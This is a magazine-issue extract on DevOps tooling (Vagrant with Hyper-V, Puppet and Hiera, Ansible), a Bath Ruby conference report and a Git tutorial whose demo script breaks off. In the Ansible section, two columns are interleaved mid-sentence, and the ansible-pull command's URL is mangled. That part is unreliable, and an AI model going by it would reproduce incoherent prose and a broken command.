It's fair to say that Hyper-V is a lot more sophisticated, isolating virtual machines into their own 'partitions' and intercepting any direct calls to the hardware at the kernel level. It's also the system on which the official Windows port of Docker relies in order to function, although you'll typically find you'll need to switch that off to avoid problems when you interact with Hyper-V directly with Vagrant. Bear in mind that while Hyper-V is enabled on your system, Oracle VirtualBox won't run, so you will need to choose one or the other to run on your host system. It gets a little worse, too, as Vagrant is not able to control everything it needs to with Hyper-V to fully function right away. For example, it isn't able to create or configure new virtual networks on the fly, so you'll need to set this up manually before you start using it. Similarly it's unable to automatically set a static IP address or automatically configure NAT access to the rest of your network. There's more info at http://bit.ly/lud_hyperv.
If you can get past these limitations, your main hurdle will be in creating compatible boxes. Windows guests will need to have Windows Remote Management up and running and an OpenSSH server installed to function correctly, and you will likely need to use the PuTTy SSH client (www.putty.org) because the vagrant ssh command doesn't work on Windows by default.

www.linuxuser.co.uk 25
Feature Control Containers

Puppet provisioning
Centrally manage application deployments and server configuration files

Puppet's main function is to manage configuration for Linux and Windows boxes across the network by slaving their settings to a common 'master' configuration called a 'catalogue'. The key benefit of this is that you can set common configurations for your servers in one place rather than having to do it manually on each server.
This should, in theory, mean fewer hard-to-troubleshoot typos and confusing log messages being caused by bad configuration values. However, Puppet takes this a step further by enabling you to define settings for smaller clusters of servers or even individual boxes from that same master server. As long as the slave is running the supplied agent software, and it has synced with the master at least once, it will respect any changes you decide to make to its environment. Puppet can track the current running state of network services and restart them as needed. It can also verify if a specific version of a package has been installed or not.
The first thing you will need to get started is a Puppet master and at least one server running the agent software. To accomplish this with Docker we need to create two containers and tie them together in the same emulated subnet so they will detect each other, like so:

$ docker network create puppet
$ docker run --net puppet --name puppet --hostname puppet puppet/puppetserver-standalone
$ docker run --net puppet puppet/puppet-agent-alpine

In this example, the Puppet agent will spot the server, fetch the latest configuration and then immediately terminate. The developer has provided much better examples that make use of Docker Compose, as well as documentation on how to tweak catalogues, on GitHub: http://bit.ly/lud_puppet.
To accomplish the same thing using VMs provisioned with Vagrant, you'll first need to create a VM with your Puppet master installed and forward ports 22 and 8140. You would then need to ensure you configure the Puppet provisioner in the second VM to point at the master. The code you need for the agent's Vagrantfile looks like this:

config.vm.provision "puppet_server" do |puppet|
  puppet.puppet_server = "server.domain"
end

Simply change server.domain to the hostname or external IP address of your Puppet master and it should connect when you build your VM. A more advanced example using shell scripts and multiple folder shares is available at http://bit.ly/lud_puppetmaster.

quick tip
Should I use Puppet Enterprise?
The commercial version of Puppet provides server-auditing tools, a browser-based GUI for Hiera, support for provisioning VMs, sophisticated role-based access control and a support contract. It's up to you as to whether these extras are worth the cost.
To install the Puppet server through the
package manager on natively installed Linux
setups – or your Puppet Master VM if you
chose to use a vanilla Vagrant image – you
will first need to enable the Puppet package
repositories. For Debian-based distros you
can fetch a matching DEB file from https://
apt.puppetlabs.com, while Yum-based
distros need the relevant RPM from https://
yum.puppetlabs.com/puppet5. Once that’s
done installation is as simple as installing
the puppetserver package.
Installing the agent on other servers
follows exactly the same process as
installing the master, but you install puppet
instead of puppetserver. The default
hostname of the Puppet server is puppet
unless you change this manually, so this
is what you would configure your installed Puppet agents to look for.

Above If the hostname of your Puppet master is 'puppet', every agent on the same network or subnet will detect it automatically on launch and sync the catalogue straight away

26
It’s also highly recommended that you set
up a good NTP service on your Puppet master
server, because syncing between it and all
servers running the agent requires the use of
time-limited certificates. If the system clocks
are too far out of sync the servers will refuse
to accept any new changes. Finally, you can

edit any of Puppet master's core settings such as environment name, DNS names, certificates and the sync interval by editing /etc/puppetlabs/puppet/puppet.conf and then restarting the service. To manually trigger a resync of any of your agents simply SSH into the server and run $ puppet agent -t.
In the walkthrough below we briefly look at writing a custom module for use with Hiera, Puppet's built-in key/value data look-up system which uses 'facts' – preset variables – to describe an environment. But before we reach for the PDK (Puppet Development Kit) we should check to see if there are already facts that we can edit in our Puppet manifests. For this Puppet provides a utility called Facter, and you can see all the facts it's aware of by using $ puppet facts. You can make use of the values that this command lists in your own Puppet manifests, using either of these two syntax options:

$fact_name
$facts[fact_name]

Find out more about Puppet's built-in variables at http://bit.ly/lud_facts.

quick tip
Get modules from Puppet Forge
You can provision and configure standard components like package managers, web servers, databases and networking services from https://forge.puppet.com. Once you've hunted down what you need you can install it with:

$ puppet module install mycomponent

Above The Facter utility lists all the built-in variables and settings – 'facts' – that the Puppet agent has exposed, so that you can use them with your custom modules and manifests

how to
Manage environment variables with Hiera

1 Edit hiera.yaml
This file lists the 'facts' you want to track. With a config folder of /etc/puppetlabs, define searchable folders in puppet/, common variables in code/environments/production/ and package settings in code/environments/production/modules/<modulename>.

2 Write a custom module
Create a new module called 'profile' and write a test class for it, ensuring it uses parameters with memorable names and sensible data types. Writing a test manifest is optional, but it can be helpful when troubleshooting your module and key values later.

3 Set common values
Head to the data/ directory in the production environment folder and set your variables in common.yaml. The keys you define should follow the pattern profile::test_class::parameter and their values should match the data types you set in your module.

4 Verify your facts
After successfully compiling your module and test class you can verify your settings with:

$ puppet lookup profile::test_class::parameter --environment production --explain
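As a sketch of what steps 1 and 3 produce – the key follows the walkthrough's profile::test_class::parameter pattern, while the hierarchy layout and example value are our own assumptions – the YAML involved might look like this:

```yaml
# Sketch of a minimal Hiera 5 hierarchy in hiera.yaml (illustrative only).
---
version: 5
defaults:
  datadir: data          # resolved relative to the environment directory
  data_hash: yaml_data
hierarchy:
  - name: "Common values"
    path: "common.yaml"

# A matching key would then live in
# code/environments/production/data/common.yaml, for example:
# profile::test_class::parameter: "a value matching the declared data type"
```

The puppet lookup command in step 4 walks this hierarchy and explains where each value was found.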

www.linuxuser.co.uk 27
Feature Control Containers

Configure Ansible
Manage your applications and configuration with Red Hat’s answer to Puppet

Quick guide
Installing Ansible
The most straightforward way to get
Ansible up and running is by installing
it through through the pip package
manager distributed with Python.
However, you can also install it through
your distro’s package manager.
Above Playbooks are Ansible’s equivalent of Puppet’s Manifests. The decision to use YAML and a Unfortunately the latest version won’t
straightforward task-based structure helps keep the learning curve shallow for devops teams be in the main channels by default,
so there’s a little extra legwork to

P
uppet is far from the only system requires you to download a special SDK and do. RHEL 7 users need to enable the
you can use to centrally manage consult your resident ‘subject matter expert’ Extras repository before Ansible can
the provisioning of applications. on its internal workings. be installed through yum, while older
Ansible prides itself on being easy to learn However, the main downside is there’s no versions will need you to enable EPEL.
and is in many ways a lot simpler to use than central community repository for pre-built Meanwhile, Ubuntu users can install
its rivals. Puppet, for instance, relies on Ansible modules and playbooks to match the the latest package from the project’s
agents that request manifests and poll for equivalents for Docker, Vagrant and Puppet. PPA; just run the following command to
changes before they can edit files and run As a result you may have to scour GitHub add that:
custom tasks. Ansible, on the other hand, for helpful module code. Thankfully, in the
$ sudo apt-add-repository ppa:ansible/ansible

doesn’t require any agents, instead reading plain English definitions of tasks you want to perform on-the-fly from a YAML file, known as a playbook.

Ansible itself is also built on Python rather than Ruby, so you may find that writing custom modules yourself has a shallower learning curve than Puppet, which often [...]. In the case of playbooks the situation is helped significantly by the comprehensive project documentation and a community of bloggers.

quick tip
Taking things a step further
You will find more documentation for Ansible Core and Ansible Tower (the enterprise version that provides a pretty web GUI) at https://docs.ansible.com. This covers setup steps, playbooks and modules for every supported version in much greater detail than we’re able to fit in this already packed feature.

As mentioned, Ansible’s playbooks are defined in YAML, and each ‘play’ in that file follows a consistent pattern. First, you define the hosts (servers) that the play will apply to, and which users Ansible should run as on those machines. You would use the ‘root’ remote user to install packages and edit sensitive files, but if you’ve disabled root logins over SSH you can elevate yourself in the next stage.

That next stage is where you define your tasks. Typically you will want to set a name for each of them, for logging purposes, and then tie each to a service or command. You can also use a template file to overwrite existing configuration files on those destination servers. Finally, you set up your handlers, which tell the machines you’re controlling how to respond if services go down or certain files change. You can also configure them to listen for other tasks being run and send notifications or log messages wherever they’re needed. Execute it with:

$ ansible-playbook myplaybook.yml -f 10

If your playbook is tracked in a git repository you can also clone and run that YAML file with:

$ ansible-pull -U [email protected] myplaybook.yml

That’s enough to get you started. Now, it’s time to dive in yourself!

DVD — Distros & FOSS
Install today!

Ubuntu MATE 18.04 (beta 2)
Sample a modern take on the traditional desktop metaphor. Built on the solid foundations of the latest Ubuntu 18.04 LTS, this benefits from February’s new release of MATE 1.20, which now has HiDPI support for crisper, more detailed images.

MX Linux 17.1
A middleweight distro using a custom Xfce desktop which packs an excellent selection of administrative utilities into its MX Tools dashboard.

Devuan 2.0 ASCII (beta)
An incredibly solid beta of the next edition of Devuan, the distro without systemd. Comes with a new login and device file manager.

All the tutorial code
If you dived straight into our Control Containers feature (on p18), you’ll want to grab our example scripts, Dockerfiles, Ansible playbook samples and Puppet manifests. In Computer Security this issue, we look at privilege escalation, which is something of an art – and we’ve included a few tools of the trade, including Vulners Scanner for sniffing out vulnerable packages.

Free with issue 191
MX Linux 17.1 – a fast, friendly and stable Linux distribution loaded with an exceptional bundle of tools – plus powerful new OS Ubuntu MATE 18.04 (beta 2): all the power of Ubuntu + MATE’s traditional desktop experience + enhanced HiDPI support, plus all tutorial code.
The magazine for the GNU generation.

Please note
This DVD autoboots to a menu, so simply insert the disc and reboot your PC. Please ensure your DVD drive is set to boot before your hard drive. Consult your PC manufacturer’s instructions. Thanks for supporting Future Publishing. 2018 Future Publishing Ltd.

Disclaimer
In no event will Future Publishing Limited accept liability or be held responsible for any damage, disruption and/or loss to data or systems as a result of using this disc. Future Publishing Limited makes every effort to ensure that this disc is delivered to you free from viruses and spyware. We do still recommend that you run a virus checker over this disc before use. Future Publishing Limited cannot guarantee that at the time of use, hyperlinks direct to that same intended content, as Future Publishing has no control over the content delivered by these hyperlinks. Unless otherwise stated, all software on this disc is distributed in accordance with the GNU General Public License. For more information on the GNU GPL please visit www.gnu.org/licenses/gpl-3.0.txt.

Contact
Future Publishing, Quay House, The Ambury, Bath, BANES, BA1 1UA
Tel: +44 (0)1225 442244
Website: www.linuxuser.co.uk

Subscriptions
Subscribe to Linux User & Developer today!
UK: 0844 249 0282
Overseas: +44 1795 419161
Email: [email protected]
6-issue subscription (UK) – £32
13-issue subscription (Europe) – €88
13-issue subscription (World) – $112
Feature Special Report: Ruby

Ruby is alive & well

Dan Bartlett

The creator of Ruby declares “We will do everything to survive” in his first UK keynote speech in five years. Chris Thornett reports from the Bath event


KEY INFO
The annual Bath Ruby conference is the biggest Ruby developer event in the UK and takes place over two days, with a mix of technical and non-technical speakers plus workshops (not to mention karaoke). https://bathruby.uk

“How is software born?” It’s an unusual first question from the genial Japanese creator of the Ruby programming language, Yukihiro ‘Matz’ Matsumoto. He’s making his first keynote speech in the UK in five years to over 500 Ruby developers at the annual two-day Bath Ruby Conference. Ruby celebrated its 25th year in February although officially its first release, 0.95, was in December 1995, so in answer to his own philosophical question, Matz suggests that software is born when it is named. It’s the kind of poetic answer you expect from the creator of such an expressive language and means Ruby was ‘born’, at least for Matz, two years earlier on 24 February 1993 – hence the big celebration in Tokyo earlier this year and across social media. Talking of the language’s origins, Matz says he wanted to name it after a jewel: “Ruby was short, Ruby was beautiful and more expensive, so I named my language Ruby,” he says, joking with his community.

However, Matz isn’t in the UK for the first time in five years just to eat birthday cake. Ruby may have reached maturity, but there are still questions over whether it can survive another 25 years. Like its creator, the Ruby language is very likable and garners passionate followers. Its syntax, for instance, is very readable but expressive in a terse way, and as a dynamic, reflective, object-oriented, general-purpose programming language it’s intuitive and easy to learn. Ruby tries not to restrict those who use it, or as Matz is often quoted, “Ruby is designed to make programmers happy.”

But not everyone is happy. The popularity of the language has been bolstered for many years by the dominance of the Ruby on Rails (RoR) web application framework, particularly among startups who wanted something to deal with much of the heavy lifting. That popularity saw the Ruby language soar to fifth place in the RedMonk Language Rankings in 2012, and rank in the top 10 in other indexes.

Since then, Ruby has drifted down to eighth. RoR, although popular, isn’t the superstar it once was and has faced fierce competition as issues such as scaling have become a greater concern for older web companies. Although not directly comparable and with its own limitations, the JavaScript run-time environment Node.js, for example, has become popular for its runtime speed at scale, ease of adoption for back-end use by front-end JavaScript users, and its single-threaded approach to handling multiple
connections, among other things (although that does make it less suitable for CPU-intensive tasks such as image processing).

It’s clear Matz is aware that the adoption of any programming language is stimulated by the projects and frameworks that grow from a language’s community and ecosystem – and RoR is an astonishing example of that. So while he was keen to use his keynote to express his regret for past mistakes he’d made in the language, he also wanted to define a path to address the performance and scaling issues.

Matz focused on two key trends: scalability, and what he calls the “smarter companion”. To combat scalability and create greater productivity, Matz believes that “faster execution, less code, smaller team [are] the keys for the productivity.” Computers are getting faster, he told the packed hall, but it’s not enough: “We need faster execution because we need to process more data and more traffic. We’re reaching the limit of the performance of the cores. That’s why Ruby 3.0 has a goal of being three times faster than Ruby 2.0” – or, as he puts it, “Ruby3x3”.

“More code is more maintenance, more debugging, more time, less productivity”

“This is easy to say,” Matz acknowledges, adding that in the days of 1.8, Ruby was “too slow” and a mistake. Koichi ‘ko1’ Sasada’s work on YARV (Yet another Ruby VM) improved performance for Ruby 1.9, and “since then,” says Matz, “we have been working hard to improve the performance of the virtual machine, but it’s not enough.”

Time for JIT
To improve performance further Ruby is introducing JIT (Just-In-Time), a technology already used by JVM and other languages. “So we’ve created a prototype of this JIT compiler so that this year, probably on Christmas Day, Ruby 2.6 will be released,” Matz confirms. You can try the initial implementation of the MJIT compiler in the 2.6 preview1 (http://bit.ly/Ruby2-6-0-preview1). Currently, you can check and compile Ruby programs into native code with the --jit option. Matz says it’s “not optimised” although for “at least CPU intensive work it runs two times faster than Ruby 2.0,” which he feels “offers a lot of room to improve performance of the JIT compiler”. For CPU-intensive tasks, in particular, Matz sounds confident that they would be able to accomplish the x3 performance improvement.

Probably the clearest overview explanation of how MJIT works is supplied by Shannon Skipper (http://bit.ly/RubysNewJIT): “With MJIT, certain Ruby YARV instructions are converted to C code and put into a .c file, which is compiled by GCC or Clang into a .so dynamic library file. The RubyVM can then use that cached, precompiled native code from the dynamic library the next time the RubyVM sees that same YARV instruction.”

Scalability, Matz also believes, should mean creating less code, as “more code is more maintenance, more debugging, more time, less productivity,” and, he joked, “more nightmare.” Less Ruby code isn’t going to mean significant changes to the language’s syntax, however, largely because there’s little room for change: “We have run out of characters. Almost all of them are used,” says Matz. Being an exponent of egoless development, he’s also not prepared to change the syntax for the sake of his pride and see existing Ruby programs broken, so he was careful to say that they weren’t going to change Ruby syntax that much.

spotlight
Sharing recipes with Ruby

Above Cookpad’s CTO Miles Woodroffe: “You stumble upon little tiny improvements to the language in every release, so it’s a really fun language to work with”

Cookpad (https://cookpad.com/uk), the main sponsor of the Bath Ruby conference, is a classic example of a web company that relies heavily on Ruby and Ruby on Rails. It’s a recipe-sharing site, and while CTO Miles Woodroffe says the site has over 60 million users a month in Japan, it’s also expanding globally, having moved its international HQ to Bristol. “We’re really invested in Ruby as a platform,” Woodroffe told us. “A lot of our infrastructure is powered by Ruby scripting – Ruby for everything pretty much.”

As well as having 100 Ruby engineers dotted around the world, Cookpad employs two core Ruby team members full-time. One of them is Koichi ‘ko1’ Sasada, creator of YARV – the official interpreter for Ruby since 1.9. Sasada is now working on concurrency (Project Guild) and it’s another way Woodroffe expects to see performance gains. Ruby 3, however, is the game changer: “It’s quite a huge paradigm shift in how Ruby is built and interpreted,” says Woodroffe. “So if we get this three times performance for everyone [...] less resources will be needed to do the same thing and probably save us money.”

Process, Matz says, should be dealt with by smaller teams as well, to handle scalability and increase productivity: “If your team is bigger than the fact they can eat two pizzas,” quoting CEO of Amazon Jeff Bezos’ Two-Pizza Rule, “then your team is too big.” Frankly, that may depend on who is on your team and how much they like pizza, but the idea, Matz says, is based on personal experience: “If your team is bigger then you need more communication and communication itself is the cost.”

More abstraction
There have been quite heated debates in recent years about the need for more Ruby abstractions that provide services for developers to build applications suited to different fields such as science, and it’s something Matz hears loud and clear. Using Ruby on Rails’ Model-View-Controller (MVC) abstraction as an example, he acknowledged they needed more, and while not perfect he says “they provide the kind of abstraction that is vital for productivity in the future.”

“One thing I regret in the design of Ruby is thread… it is too primitive”

One key abstraction he elaborated on was a concurrent project called Guild. “One thing I regret in the design of Ruby was thread… it is too primitive,” Matz admits. But Ruby is a victim of its own success; the language is used by so many people, Matz feels it’s too late to remove thread. “I think it’s okay to include a new abstraction,” he ventures, “and discourage the use of thread” in the future. “Guild is Ruby’s experiment to provide a better approach. Guild is totally isolated,” Matz explains.

spotlight
Polishing Ruby

Contributing to a programming language isn’t something you can just drop into; it involves quite a steep learning curve. Ruby’s answer is to run Hack Challenges. These are an opportunity for aspiring Ruby committers to test their mettle and learn how to extend Ruby features, fix bugs and improve the overall performance of the language. Up until very recently such challenges only ever took place in Japan, but in an effort to draw in new contributors from the global community, in March Matz – along with core Ruby committers Koichi ‘ko1’ Sasada and Yusuke ‘Mame’ Endoh – headed to Cookpad’s new international UK HQ in Bristol to run a challenge.

Leading developers were invited from across the world – Paris, Cape Town, Sao Paulo and San Francisco – and tasked with hacking the Ruby interpreter. According to Cookpad CTO Miles Woodroffe, Matz was impressed by the high standard of the engineers. “My dream will be if we get five people from that who, over the next year or two, start contributing,” he says.

Above Ruby developers were flown in from across the globe for the first Ruby Hack Challenge outside of Japan
“Basically we do not have a shared state between Guilds. That means that we don’t have to worry about state-sharing, so we don’t have to care about the locks or mutual exclusives. Between Guilds we communicate with a channel or queue.” Matz expects to ship Guild’s concurrent abstraction in Ruby 2.7 or 2.8.

Another codenamed project that Ruby has in the works is Steep. This is an attempt at static-type analysis for Ruby: “It’s difficult to analyse the Ruby type information, because Ruby is a dynamically typed language, so you can do anything with all types,” says Matz. Some subsets of Ruby can be statically typed, and Matz says they can add those static-type checks, which are “kind of like a TypeScript user-defined type information. We’re going to infer as much as possible and we’re trying to get the information from those external type-defined files or from the runtime profile type analysis…”

Using this analysis, Matz suggests, developers will be able to detect more errors. “We’re not going to implement 100 per cent detection safety, it’s not possible for Ruby, but we can detect 20-40 per cent of errors,” he says.

quick guide
RedMonk Language Rankings, Sep 2012 vs Jan 2018

Rank  Sep 2012     Jan 2018
 1    JavaScript   JavaScript
 2    Java         Java
 3    PHP          Python
 4    Python       PHP
 5    Ruby         C#
 6    C#           C++
 7    C++          CSS
 8    C            Ruby
 9    Objective-C  C
10    Shell        Objective-C

Above Ruby’s rating in terms of developers’ favourite languages has dropped dramatically

Above The first Ruby Hack Challenge outside of Japan reflects a drive to see more contributors from the global Ruby community

Matsumoto also touched on Ruby becoming a “smarter companion” as well as the programmer’s best friend. “We [are] now at the beginning of smarter computers, so, for instance, RuboCop [static code analyser] is one way of helping you.” Matz also suggested that in the future, when you compile a program “Ruby could suggest [for example] ‘You called this method with an argument string but [did] you expect to call this method with integer?’”. After his keynote, Matz described this programming interactivity to be something like Tony Stark’s Jarvis. Essentially, he wants to see “an AI that will interact with me to organise better software.”

“We will have it so that every Ruby 2 program will run in Ruby 3”

Change brings with it the possibility of software that no longer works as intended, or indeed at all. It’s a concern that haunts Matz from past mistakes: “In the past we made a big gap, for example between 1.8 and 1.9,” he says. “We made a big gap and introduced many breaking changes, so that our community was divided into two for five years.” Matz sees this as a tragedy: “We’re not going to make that mistake again so we will do a continuous evolution. We’re going to add the JIT compiler to 2.6 and not wait until Ruby 3.0, we’re going to add some type of concurrent abstraction in the future in Ruby 2.7 to 2.8, but it will not be a breaking change. We will have it so that every Ruby 2 program will run in Ruby 3.”

Reversing Ruby’s current slow trajectory downwards is not going to be an easy task and Matz seems to realise this: “Ten years ago Ruby was really hot, because of Rails. These days Ruby isn’t considered hot, but it is stable.” Indeed, Ruby has crossed that gap into maturity and Matz has no intention of giving up on it any time soon: “Ruby is a good language to help you become productive and I want Ruby to be like that for forever, if possible. That means we have to evolve continuously forever, so we can’t stop; we can’t stop.”

Q&A
Creator of Ruby, Yukihiro ‘Matz’ Matsumoto

What is it about programming languages that fascinate you?
The programming language is the way to express what you want a computer to do in a way that both we humans and computers can understand. It’s kind of a compromise. But at the same time it is the programming language that is the way to express your thoughts in a clear manner so that it is also a tool to express your ideas. Think about that – you can write down your software on a sheet of paper, so it doesn’t execute on the computer simply because it can’t see the paper, but it is still a program and it will still help you understand what you want to do.
Programming languages have different ways to express ideas, how to organise the software structure or maybe providing some kind of abstraction. It’s that part, it’s that psychological aspect of the language that’s motivated me to work on it for the last 25 years.

Have you always been a fan of open source software? Was that always your intention when creating Ruby?
Actually, when I was at school I studied programming a lot from reading the source code from free software, like [GNU] Emacs and other free software tools, so it was so natural for me to make my software free or open source, unless I have some constraint like the software was owned by the company or something like that. But Ruby was originally my hobby project.

Have you encountered people who are afraid of the changes to Ruby?
We made several mistakes designing the language, but if we fix them in the future that would break so much code, so we’ve given up that kind of fix. Fixing the issues would satisfy us and our self-esteem, but it is not worth it to harm the big codebase. For example, if I make this small breaking change that would affect 5 per cent of the users that could improve performance by a factor of two, I would like to do that... but I’m not going to do a change for my sense of self-esteem.

How do you feel about people who say Ruby is dead – does it bother you much?
[Laughs] Yeah, I don’t mind criticism. If someone has some bad thing about the language they just leave without saying anything. But having criticism is an indication that we have something to improve. I welcome that kind of criticism so we can take it constructively.
Tutorial Essential Linux: Git

part one

Git: Learn version control with our simple Git project

John Gowers

Get started using Git, the powerful and popular version-control system written for Linux kernel development
John is a university tutor in Programming and Computer Science. He likes to install Linux on every device he can get his hands on, and uses terminal commands and shell scripts on a daily basis.

Resources
Git: If not already installed, install through your package manager or from https://git-scm.com
Wget: Install through your package manager or from www.gnu.org/software/wget

It can be difficult to manage a large software project with lots of different contributors. You need to be able to keep track of all the changes as they come in so that you can revert them, build on them or deal with conflicts between them as necessary. The tools that we use for this are called version-control systems; there are many different systems available, but our favourite is Git.

Git was developed by Linus Torvalds, the creator of the Linux kernel, because none of the other version-control systems at the time were suitable for the large software project he was working on – that is, Linux itself. Since then, Git has been a huge success. In the 2015 Stack Overflow Developer Survey, it was the preferred version-control system of 69.3 per cent of respondents. Its companion site, GitHub, is used by 24 million people across 200 countries. Moreover, because of its connection with Linux, it’s used particularly often in the Linux community and for open source software projects.

With all that in mind it’s very useful to know how to use Git – not only if you plan to contribute to a large piece of software, but also for your own smaller projects. We’ll use GitHub (www.github.com) to host our projects. Git is not tied to GitHub in any way; however, this website is the most commonly used repository of Git projects. If you haven’t already got a GitHub account, create one now.

Our first project
Git is most commonly used as a version-control system for source code and other parts of computer programs. However, we’d like to make this tutorial as language-agnostic as possible, so in our example we’re going to imagine another situation in which we might want to use a version-control system: managing a collaboratively written novel.

Our good friend Jane has recently completed a draft of a novel called Emma, and she’s been in touch to ask if we want to collaborate with her in order to make some improvements to the novel. The only snag is that Jane is from the 18th century, and knows nothing about version-control software, so she’s asked us to take care of that aspect of things.

Above GitHub provides a user-friendly way to host and browse through Git projects
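Before following along, it is worth checking that Git is installed and telling it who you are, since every commit is stamped with an author. This is a short first-time setup sketch; the name and email values are placeholders for your own details:

```shell
# Check the installed version; any reasonably recent Git will do.
git --version

# Identify yourself to Git; these placeholder values label your commits.
git config --global user.name "My Name"
git config --global user.email "my.name@example.com"

# Confirm what was stored.
git config --global user.name
```

You only need to do this once per machine; the values are kept in ~/.gitconfig and used for every repository you work in.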

Figure 1
Above GitHub makes it very easy to copy the link that enables us to unlock the power of Git at the command line

Readme
It’s traditional to initialise a GitHub repository with a file, README.md, that contains information about the project such as its name, a description and possible installation and running information. Unlike a normal text README, the file README.md supports Markdown formatting, so we can make headings using # Heading, bold text using **bold** and italics using *italics*. This formatted text is what appears on the project’s home page.

The first step is to create a new repository, which we will do on the GitHub website. Navigate to the home page at https://github.com and click the button that says ‘Start a project’. A page will appear asking for a project name and some other information. Since GitHub projects need to have unique names, we cannot suggest a particular name for you to use, so you’ll need to come up with your own name for the project; try to include ‘Emma’ somewhere in order to make it clear what the project is about. If you like, write a description of the project.

Tick the box that says ‘Initialize this repository with a README’. This will create a README file inside the repository that we can use to record important information about the project. More importantly, creating this file will initialise the repository so that we can start working with it on our computer.

Click ‘Create repository’ in order to create the repository; we arrive at the home page for our new repository. The GitHub website enables us to make lots of changes online, but from now on we’ll stick to using Git from the command line.

“Git is not tied to GitHub in any way; however, this website is the most commonly used repository of Git projects”

The last thing we need to do is to click the green button marked ‘Clone or download’ and copy the URL that appears, as shown in Figure 1. This is the location of our repository online, and we will need it in order to clone the repository to our computer.

Clone and start the repository
Open a command window, and navigate to the location where you want to clone the repository. It’s a good idea to create a new directory to hold all your Git projects. Once inside that directory, type git clone and then paste in the URL that you copied and press enter. For example:

$ git clone https://github.com/My_Name/collaborative-emma-novel.git

This will create a new directory with the same name as the project. Navigate into it with cd. The directory we have created is a local copy of the project living at GitHub.com. At the moment, it appears to contain nothing but the README file, but if we run the command ls -a, we see that it also contains a directory called .git. This directory contains all the information about the project that Git needs to run – make sure you don’t delete it! When we make changes in the local branch, they will not be pushed to the server immediately. This is a good thing, because it means that if two people are working on a file at the same time, we have a chance to reconcile the changes.

It’s time to initialise the repository by adding some files. In order to download Jane’s novel, run the following:

$ wget www.gutenberg.org/files/158/158-0.txt -O novel.txt
$ sed -i -e 's/\r//' novel.txt

We now have a file, novel.txt, that contains the text of the novel. The second command converts the text file newlines from DOS to UNIX format.

Before we do anything else, let’s push this new file to the online repository. When we do this, it’s a good idea to check the status of our local branch by running the following command:

$ git status

We should see the following output:

On branch master
Your branch is up-to-date with 'origin/master'.
Untracked files:
  (use "git add <file>..." to include in what will be committed)

        novel.txt

This tells us that the new file, novel.txt, is not yet being tracked by Git. We remedy this situation by running the following command:

$ git add novel.txt

If we run git status again, then we see that novel.txt is now marked as a ‘new file’.

The next step is to commit our changes. Committing is something that we do periodically whenever we’ve made a fairly substantial number of changes. We cannot push any modifications we have made to the online repository

before we have committed them, but we might want to commit multiple times before we push changes online. Committing requires us to add a message detailing what the changes are, so it's a good idea to commit at any point that we've made enough changes to warrant writing such a message. This time, run the command:

$ git commit -m 'Added the original text of the novel.'

to commit our most recent changes. If we run git status now, we see that novel.txt is no longer marked as a new file, because it is part of the current commit. However, we now get a message saying that we are ahead of 'origin/master' by one commit. This is because we have performed a commit on the local branch, but have not yet pushed it to the server.
Before we push any changes to the server, it's a good idea to run the following command:

$ git pull

This command will fetch or 'pull' any changes that have been made to the online branch. Had someone else modified the online repository, we would want to fetch their changes so that we could deal with any possible conflicts before pushing our version. In this case, since no one else is working on the repository, we should get the message Already up-to-date. We can then run the following command to push our changes to GitHub.com:

$ git push -u origin master

We're prompted for our GitHub username and password; after we've given these, Git sends the new file. We can now reload the page for our repository on GitHub.com and we should see that the new file novel.txt now appears there alongside the README.

Gists
One thing you might come across if you use GitHub a lot is gists, normally hosted at gist.github.com. A gist is a particular type of GitHub repository, normally intended for sharing small snippets of code with other people, or storing them for your own use. The benefit of using a gist rather than a normal file-storage service such as Pastebin is that, since a gist is really a Git repository, GitHub stores the full version history of code.

Right Merge conflicts can be tricky to deal with, but Git makes handling the process as streamlined as possible

Managing merge conflicts
A great strength of Git is that it allows us to deal with merge conflicts: situations in which two people have made changes to a file that clash with one another. To demonstrate this, navigate to a new directory – somewhere other than where you cloned the repository the first time – and re-run the git clone command that we used before. You might have to copy the Git URL again. This will create a new local copy of the repository, allowing us to simulate a merge conflict caused by two separate authors making incompatible changes.
The first author has decided that the book needs to be made more teenager-friendly by changing the age of the main character from twenty-one to seventeen. Inside the first local copy of the repository, open the file novel.txt in a text editor, and modify the word twenty-one on line 48 so that it says seventeen instead.
Let's push these changes to the online repository. Start off by running the following command:

$ git commit -a -m "Changed Emma's age to 17."

The -a flag to git commit tells it to add all new changes to the current commit. This saves us having to run git add before running git commit as we did before. We can then run git push -u origin master again to push the changes online.
The second author has decided to make some more drastic changes to the first paragraph. Inside the second local copy of the repository, open the file novel.txt and replace the first paragraph with the following:

So okay, you're probably thinking, "Whatever, is this like a Noxema ad?" But I actually have a bare normal life for a teenage girl.

Run git commit -a -m 'Changed the first paragraph.' in order to commit these changes. Before we try and push them to GitHub.com, let's run the command git pull to fetch any new changes from the repository. When we run this command, we get the following error:

CONFLICT (content): Merge conflict in novel.txt
Automatic merge failed; fix conflicts and then commit the result.

We're getting this message because our current commit contains modifications that cannot be reconciled with the modifications that have been made to the master branch since we last pulled the code from it. To get a better idea of what's going on, let's open the file novel.txt in a text editor. When we open it and move to line 48, we discover that Git has changed the file so that it displays the conflicts in such a way that we can choose ourselves how to resolve them. Figure 2 shows the relevant part of the code. Wherever it finds a conflict between the two versions, Git has put

<<<<<<< HEAD

followed by the text as it is in the current repository, followed by =======, followed by the text as it is on GitHub, followed by >>>>>>> and a hash code indicating the particular commit that is online.
It's now up to the individual collaborator to decide how

to handle the merge: Git cannot decide itself what the best course of action is, so you should. You might want to choose one or the other of the two passages, or you could decide to incorporate changes from both – perhaps by using the more modern introduction, but changing the word 'teenage' to '17-year-old'. When you've finished making your changes, save and close the file, and then run a git commit command to commit the changes, followed by git push -u origin master to push them to the repository online.
Note that if we go back to the first local repository and run git pull, Git will now fetch the new, merged version from the server, and will not register a merge conflict, even though the current contents of the branch conflict with what is online. The reason is that the online branch is now a 'commit ahead' of this local branch – that is, it's considered to be a more up-to-date version of what's in our first local branch.
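The whole round trip can be reproduced offline. The sketch below is our own demo script (the file contents, author names and temporary paths are invented for illustration); it uses a local bare repository as a stand-in for GitHub.com, creates two clones, makes two conflicting edits, triggers the conflict on git pull and then resolves it:

```shell
#!/bin/sh
set -e
tmp=$(mktemp -d); cd "$tmp"
git init -q --bare origin.git            # stands in for the GitHub repository

git clone -q origin.git author1 2>/dev/null
cd author1
git config user.name "Author One"; git config user.email "[email protected]"
echo "Emma was twenty-one years old." > novel.txt
git add novel.txt
git commit -q -m "Added the original text of the novel."
git push -q origin HEAD
branch=$(git symbolic-ref --short HEAD)  # works whatever the default branch name is

cd "$tmp"
git clone -q origin.git author2          # the second author's local copy
git -C author2 config user.name "Author Two"
git -C author2 config user.email "[email protected]"

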